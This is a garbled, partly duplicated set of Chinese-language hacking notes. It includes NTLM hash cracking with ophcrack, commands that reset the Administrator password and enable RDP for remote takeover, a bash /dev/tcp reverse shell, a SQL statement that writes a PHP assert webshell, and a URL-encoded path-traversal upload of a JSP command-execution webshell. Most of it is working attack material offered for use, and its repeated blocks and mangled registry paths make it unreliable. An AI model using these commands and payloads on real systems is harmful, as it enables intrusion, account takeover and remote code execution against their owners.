如果得到密码的NTML哈希无法破解,可以采用彩虹表爆破的方式,爆破出Administrator的密码:保存扫描出的NTML哈希值-使用ophcrack(去官网下载字典库https://ophcrack.sourceforge.io/tables.php)梭哈一下。
1.whoami//查询当前用户权限
2.netuser//查着系统用户
3.netuserAdministratorpte//修改Administrator用户密码为pte
4.reg add “HKLMISYSTEMICurrentControlSetiControlTerminal Server /v fDenyTSConnections /t reg_dword /d 0/f/开启3389远程终端
5.win7/win8/win10:REG query HKLMISYSTEMCurrentControlSetControllTerminal “ServerWinStationsRDP-Tcp /y PortNumbewinxp/win2003:REG query HKLMISYSTEMICurrentControlSetControlTerminar ServerWdsrdpwdTdstcp /v PortNumber //查询3389远程服务端口
6.使用Administrator用户及新修改的密码远程登陆系统,做你想做的-
2.netuser//查着系统用户
3.netuserAdministratorpte//修改Administrator用户密码为pte
4.reg add “HKLMISYSTEMICurrentControlSetiControlTerminal Server /v fDenyTSConnections /t reg_dword /d 0/f/开启3389远程终端
5.win7/win8/win10:REG query HKLMISYSTEMCurrentControlSetControllTerminal “ServerWinStationsRDP-Tcp /y PortNumbewinxp/win2003:REG query HKLMISYSTEMICurrentControlSetControlTerminar ServerWdsrdpwdTdstcp /v PortNumber //查询3389远程服务端口
6.使用Administrator用户及新修改的密码远程登陆系统,做你想做的-
bash -i > /dev/tcp/127.0.0.1/2345bash -i:打开一个bash交互界面
>:重定向
/dev/tcp:调用建立一个socket连接
127.0.0.1:可以任意更改需要反弹到的IP地址
2345:反弹到的端口
上面的是一个典型的反弹shell的语句,但是这种不能实时地在攻击机输入,攻击机输出,只能在靶机输入东西,然后在攻击机看到
>:重定向
/dev/tcp:调用建立一个socket连接
127.0.0.1:可以任意更改需要反弹到的IP地址
2345:反弹到的端口
上面的是一个典型的反弹shell的语句,但是这种不能实时地在攻击机输入,攻击机输出,只能在靶机输入东西,然后在攻击机看到
执行sql语句后 就会把记录保存在shell.php 里
SELECT '<?php @assert($_REQUEST["123"]);?>';
SELECT '<?php @assert($_REQUEST["123"]);?>';
burp抓包 构造
payload file_path=&dirs=%2F&res_path=res&file_name=../../static/jsp_shell.
jsp&file_content=%3C%25%0A+++
+if(%22p0desta%22.equals(request.getParameter(%22pwd%22)))%7B%0A++
++++++java.io.InputStream+in+
%3D+Runtime.getRuntime().exec(request.getParameter(%22i%22)).getIn
putStream()%3B%0A++++++++int+a+%3D+-1%3B%0A++++++++byte%5B%5D+b+
%3D+new+byte%5B2048%5D%3B%0A+++++++
+out.print(%22%3Cpre%3E%22)%3B%0A+++++++
+while((a%3Din.read(b))!%3D-1)%7B%0A+++++++++++
+out.println(new+String(b))%3B%0A++++++++%7D%0A+++++++
+out.print(%22%3C%2Fpre%3E%22)%3B%0A++++%7D%0A%25%3E
payload file_path=&dirs=%2F&res_path=res&file_name=../../static/jsp_shell.
jsp&file_content=%3C%25%0A+++
+if(%22p0desta%22.equals(request.getParameter(%22pwd%22)))%7B%0A++
++++++java.io.InputStream+in+
%3D+Runtime.getRuntime().exec(request.getParameter(%22i%22)).getIn
putStream()%3B%0A++++++++int+a+%3D+-1%3B%0A++++++++byte%5B%5D+b+
%3D+new+byte%5B2048%5D%3B%0A+++++++
+out.print(%22%3Cpre%3E%22)%3B%0A+++++++
+while((a%3Din.read(b))!%3D-1)%7B%0A+++++++++++
+out.println(new+String(b))%3B%0A++++++++%7D%0A+++++++
+out.print(%22%3C%2Fpre%3E%22)%3B%0A++++%7D%0A%25%3E